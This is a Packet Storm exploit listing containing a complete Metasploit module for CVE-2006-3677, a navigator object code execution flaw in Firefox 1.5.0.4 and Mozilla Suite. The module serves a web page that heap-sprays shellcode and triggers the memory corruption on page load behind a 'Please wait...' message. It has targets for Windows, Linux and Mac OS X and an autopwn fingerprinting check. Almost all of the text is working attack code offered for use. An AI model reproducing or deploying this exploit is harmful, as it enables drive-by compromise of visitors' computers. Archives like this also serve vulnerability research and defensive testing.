Mozilla Suite/Firefox Navigator Object Code Execution

2009-10-27T00:00:00
ID PACKETSTORM:82262
Type packetstorm
Reporter H D Moore
Modified 2009-10-27T00:00:00

Description

                                        
                                            `##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core/constants'  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
include Msf::Exploit::Remote::BrowserAutopwn  
autopwn_info({  
:ua_name => HttpClients::FF,  
:javascript => true,  
:rank => NormalRanking, # reliable memory corruption  
:vuln_test => %Q|  
is_vuln = false;  
if (window.navigator.javaEnabled && window.navigator.javaEnabled()){  
is_vuln = true;   
}  
|,  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Mozilla Suite/Firefox Navigator Object Code Execution',  
'Description' => %q{  
This module exploits a code execution vulnerability in the Mozilla  
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit   
requires the Java plugin to be installed.  
  
},  
'License' => MSF_LICENSE,  
'Author' => ['hdm'],  
'Version' => '$Revision$',  
'References' =>   
[  
['CVE', '2006-3677'],  
['OSVDB', '27559'],  
['BID', '19192'],  
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-45.html'],  
['URL', 'http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html'],  
],  
'Payload' =>  
{  
'Space' => 512,  
'BadChars' => "",  
},  
'Targets' =>  
[  
[ 'Firefox 1.5.0.4 Windows x86',   
{  
'Platform' => 'win',  
'Arch' => ARCH_X86,  
'Ret' => 0x08000800,  
'Fill' => "%u0800",  
}  
],  
[ 'Firefox 1.5.0.4 Linux x86',   
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86,  
'Ret' => -0x58000000,  
'Fill' => "%ua8a8",  
}  
],  
[ 'Firefox 1.5.0.4 Mac OS X PPC',   
{  
'Platform' => 'osx',  
'Arch' => ARCH_PPC,  
'Ret' => 0x0c000000,  
'Fill' => "%u0c0c",  
}  
],  
[ 'Firefox 1.5.0.4 Mac OS X x86',   
{  
'Platform' => 'osx',  
'Arch' => ARCH_X86,  
'Ret' => 0x1c000000,  
'Fill' => "%u1c1c",  
}  
],   
],  
'DisclosureDate' => 'Jul 25 2006'  
))  
end  
  
def on_request_uri(cli, request)  
  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })  
  
# Handle the payload  
handler(cli)  
end  
  
def generate_html(payload)  
  
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  
  
return %Q|  
<html><head>  
<script>  
function Exploit() {  
if (window.navigator.javaEnabled) {  
var shellcode = unescape("#{enc_code}");  
var b = unescape("#{target['Fill']}");  
while (b.length <= 0x400000) b+=b;  
  
var c = new Array();  
for (var i =0; i<36; i++) {  
c[i] =   
b.substring(0, 0x100000 - shellcode.length) + shellcode +  
b.substring(0, 0x100000 - shellcode.length) + shellcode +   
b.substring(0, 0x100000 - shellcode.length) + shellcode +   
b.substring(0, 0x100000 - shellcode.length) + shellcode;  
}  
  
window.navigator = (#{target['Ret']} / 2);  
try {  
java.lang.reflect.Runtime.newInstance(  
java.lang.Class.forName("java.lang.Runtime"), 0  
);  
}catch(e){  
  
}  
}  
}  
</script>  
</head><body onload='Exploit()'>Please wait...</body></html>  
|  
end  
end  
  
`